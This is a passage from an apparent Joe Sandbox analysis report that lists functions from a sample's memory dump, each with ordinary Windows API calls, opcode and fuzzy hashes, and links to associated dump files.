Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction ID: e3b84f992feb57a4dfd255936f460a958b2b8c3cb8c2d645444b6b0696f6a75b
Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
Instruction Fuzzy Hash: 22022D71E002199FDF24CFA9D9806ADBBF1EF48324F25816AD919E7381D735AE41CB90

Function 007CAF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 007CAF35
GetNumberFormatW.KERNEL32(00000400,00000000,?,007EE72C,?,?), ref: 007CAF84

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: FormatInfoLocaleNumber
String ID:
API String ID: 2169056816-0
Opcode ID: 447632f1021a5fc4a0a2a5af402c57c79703c8f8315f6dd23ade9e3e52f63f91
Instruction ID: 9b9361fc9b51fed9575cdf457bd5132387dff36661dd5bb14dd4f38bdac5fd53
Opcode Fuzzy Hash: 447632f1021a5fc4a0a2a5af402c57c79703c8f8315f6dd23ade9e3e52f63f91
Instruction Fuzzy Hash: 37015E7A100358AAD7109FA4DC45F9B77B8EF0D710F008426FB059B191D3749A148BA5

Function 007B6C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(007B6DDF,00000000,00000400), ref: 007B6C74
FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 007B6C95

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 7b84e0d6f6bc8a3ccea8d3141c163c87727f437f0d760e45993efd985f05cb33
Instruction ID: c0ce581692c9b109cfb31a75d00c9cdd31bc9eafa6ecb6547f55edae862bbfec
Opcode Fuzzy Hash: 7b84e0d6f6bc8a3ccea8d3141c163c87727f437f0d760e45993efd985f05cb33
Instruction Fuzzy Hash: 08D09E31245300BAEA110A614D4AF6A6B5ABB45B55F14C814B7559D0E0C67CD514AA29

Function 007E19F4 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,007E19EF,?,?,00000008,?,?,007E168F,00000000), ref: 007E1C21

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 33ab3ec8a1c83cb7ebe8ea08f6b98f9eca6c307be427edb3daa78e0dd17bbfa8
Instruction ID: 29b6fd45e47f508e355e75bdc41a78030405cedcbff6fd9e00253f43ae4af437
Opcode Fuzzy Hash: 33ab3ec8a1c83cb7ebe8ea08f6b98f9eca6c307be427edb3daa78e0dd17bbfa8
Instruction Fuzzy Hash: 01B16C71211648DFD719CF29C48AB657BE0FF09364F698658E89ACF2A1C339ED81CB40

Function 007CF654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 007CF66A

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 5b84ae5298920c96f4a8d3f3ea2cc47bff6bc29d7f1170e3d4a666c25fb906d5
Instruction ID: 5f76cb773c874e8ae041a836710ac2304b267e12f8e0c42770bd205702b17272
Opcode Fuzzy Hash: 5b84ae5298920c96f4a8d3f3ea2cc47bff6bc29d7f1170e3d4a666c25fb906d5
Instruction Fuzzy Hash: BE515EB19016198FEB28CF54ED85BAABBF5FB48314F24C97ED519EB250D3789900CB50

Function 007BB146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 007BB16B

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 557d345ef09a174ec0f54eb6ef6733666221bc631de980d8d9ec9d64953ca986
Instruction ID: 5c3f4bcd388d4aa0e758fced2f5429b434b080e527478a346f66f8a574dc928e
Opcode Fuzzy Hash: 557d345ef09a174ec0f54eb6ef6733666221bc631de980d8d9ec9d64953ca986
Instruction Fuzzy Hash: FFF030B4D0024CCFDB18CB18EC916E573F1F748315F608695D91593390C7B8AA80CE64

Function 007B40FE Relevance: 1.5, Strings: 1, Instructions: 276COMMON

Download Yara Rule

Strings

gj, xrefs: 007B41BC

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID:
String ID: gj
API String ID: 0-4203073231
Opcode ID: 06cc2a0dfd7da32cf5f3e439dfe99f7cc1e4ffa1eb6a9970eaf2094bb0c8cbf6
Instruction ID: 99122e00535c1897d74c292ab48374f0e13eda7eb64437b71f6c400e20b07713
Opcode Fuzzy Hash: 06cc2a0dfd7da32cf5f3e439dfe99f7cc1e4ffa1eb6a9970eaf2094bb0c8cbf6
Instruction Fuzzy Hash: 08C12876A183818FC354CF29D880A5AFBE1BFC8308F19892DE998D7311D734E955CB96

Function 007CF9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,007CF3A5), ref: 007CF9DA

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 0b6f6a78e0f70536c67217670395afda84cbe88fe64af6106d1db7e07f8d165f
Instruction ID: b4132eb3d265040f37959cefc088f459a2b190f5f97c92a9d460c23941e48069
Opcode Fuzzy Hash: 0b6f6a78e0f70536c67217670395afda84cbe88fe64af6106d1db7e07f8d165f
Instruction Fuzzy Hash:

Function 007DC030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 007DC030

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: db3179acacf3b7a8cf7c370ec16e7018193ccab6bac47d9b6ad33a222905a05a
Instruction ID: 691c80f32d7e27a940ed049f5ec2704fd282cfdacd1ad40b8e31fd6af4095aec
Opcode Fuzzy Hash: db3179acacf3b7a8cf7c370ec16e7018193ccab6bac47d9b6ad33a222905a05a
Instruction Fuzzy Hash: F7A012301021008B8700CF345E4C64836A9A91418070480195004C5060D63440605700

Function 007C62CA Relevance: .8, Instructions: 829COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
Instruction ID: 7d6d30e963172b534d88be6b766e03436683db6842fb1eb2e01b767c1e7f4fe7
Opcode Fuzzy Hash: 5f8113f2fe17e1fe5adf28291dd6dc1f64d00099287cbfcd1ac5a0770544dab2
Instruction Fuzzy Hash: 6E62A4716047859FCB25CF28C4D0BB9BBE1AF95304F18896DD8EA8B346D738E945CB11

Function 007C77EF Relevance: .8, Instructions: 817COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
Instruction ID: 009c953ed01aee1284ba155a1e65bf7959c37dabd4557a9cdd8a1efdd19ce2af
Opcode Fuzzy Hash: bb9617cfb9dcd5ed73515ceaa1cdae9c81077d575e7d9551ef57e855e6e5c47f
Instruction Fuzzy Hash: 5162E8716083458FCB19CF28C890BB9BBE1BF95304F18896DE9968B346EB34E945CF15

Function 007BF461 Relevance: .7, Instructions: 694COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
Instruction ID: c56f9d8d8d263aa623387c4d0ca8d9bcec55678ec6cd1125fa3910a32b2bb728
Opcode Fuzzy Hash: 07bf4a65aa449dff48fd2b0c9f6b18a690921bffffe8b35fa307a18f9ecacfdb
Instruction Fuzzy Hash: 6A523972A187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86

Function 007C7153 Relevance: .5, Instructions: 536COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2ca5a8dc2820ccaccb0eb845f5f4431e276ad0ead8514b448c679edac3be36b
Instruction ID: c30d78b55ceedfac2b1704412a1b3261689f5b85e86d03f796309a3f551091d6
Opcode Fuzzy Hash: e2ca5a8dc2820ccaccb0eb845f5f4431e276ad0ead8514b448c679edac3be36b
Instruction Fuzzy Hash: 6F12C1B16087469FC71CCF28C494BB9B7E1FB94304F14892EE996C7781EB38A994CB45

Function 007BC426 Relevance: .5, Instructions: 454COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2edaf479ad1b5973301704e43caf1d158d9ff1fcf80a4c61d2cebd09eb600c5e
Instruction ID: b777c6ca7071fe76706f0a7027b1d5577b13cedca9aae4de0aa06837b6edd093
Opcode Fuzzy Hash: 2edaf479ad1b5973301704e43caf1d158d9ff1fcf80a4c61d2cebd09eb600c5e
Instruction Fuzzy Hash: E5F1BE716083018FD716CF28C485AAABBE1EFD9318F148A2EF4D5D7256E738E945CB42

Function 007C6CDC Relevance: .3, Instructions: 343COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: d2ceff90823eca9eea97bfaac2f200c896754f56a2b3c1dcdeca1d68e9f4eb51
Instruction ID: 68c745406c56c0ca51322c44207623aeacb8c2b643607e9f290e361fa4482142
Opcode Fuzzy Hash: d2ceff90823eca9eea97bfaac2f200c896754f56a2b3c1dcdeca1d68e9f4eb51
Instruction Fuzzy Hash: DFD1D6B16083458FDB14DF28C884B5BBBE5BF89308F08456EF8899B342D778E945CB56

Function 007BE9B7 Relevance: .3, Instructions: 320COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 919fafd6dcc81c9fa716080d837eab0cb7e74b1719356f115d88c72528c75362
Instruction ID: 1643a80507e39d922aada67662fcf0553be1f071fc4f6dc3794f9099c87053c9
Opcode Fuzzy Hash: 919fafd6dcc81c9fa716080d837eab0cb7e74b1719356f115d88c72528c75362
Instruction Fuzzy Hash: 40E159755083948FC304CF29D8948AABFF0EF9A300F45495EF9D497352C239EA19DBA6

Function 007C4088 Relevance: .3, Instructions: 270COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
Instruction ID: de800c6cefad4d73be0148519c4e559f9b9de91b691f33da81bda6986df1d013
Opcode Fuzzy Hash: 099330c7f7ccdd417e25f555c4bfc52021962f4fe602807f6dd12a6fe714b0d5
Instruction Fuzzy Hash: E49145B02003499BDB25EE64D8A9FFE77D5FBA0300F10092DF99687282EA7CA545C352

Function 007C43BF Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction ID: 90d4375c4bc6372a4e3cf53c62b9de16b3f5341a04fbf84c5aad60d49414238b
Opcode Fuzzy Hash: 24399a2ad99dde1ffdfe4095f328d7bde986876a5c10afdb0a2a788d37c48f2a
Instruction Fuzzy Hash: 558170713043869FDB29EE68D8E4FBD37D4EB90304F10492DE9C68B682DA7C9985C752

Function 007D51C9 Relevance: .2, Instructions: 237COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc09c1393809cd0f3baa88f6da22c6919ea297b37c64e6f98fe46991731efc42
Instruction ID: acb9f973bb7c71f4ea4262b255f286824117f581451776e2f3517af8145d8b90
Opcode Fuzzy Hash: bc09c1393809cd0f3baa88f6da22c6919ea297b37c64e6f98fe46991731efc42
Instruction Fuzzy Hash: 02618AB1600F0897DA389A68AC99BBE23B4FB51384F14061FE483DF381D69DFD4A8755

Function 007D4F9A Relevance: .2, Instructions: 214COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.0000000000812000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035880995.0000000000813000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7b0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
Instruction ID: 2b098093d99f10a3136c1828493c5f7fda2b54a0c3e36a11fe811ce6c0761baf
Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
Instruction Fuzzy Hash: 05515660600F4997DF384638C55ABBF67F59B12300F1C092BE982DB392C62EED4583A6

Function 007BEFE2 Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2035627275.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true

Associated: 00000000.00000002.2035608536.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035665624.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2035689925.00000000007EE000.00000004.00000001.01000000.00000003.sdmpDownload File
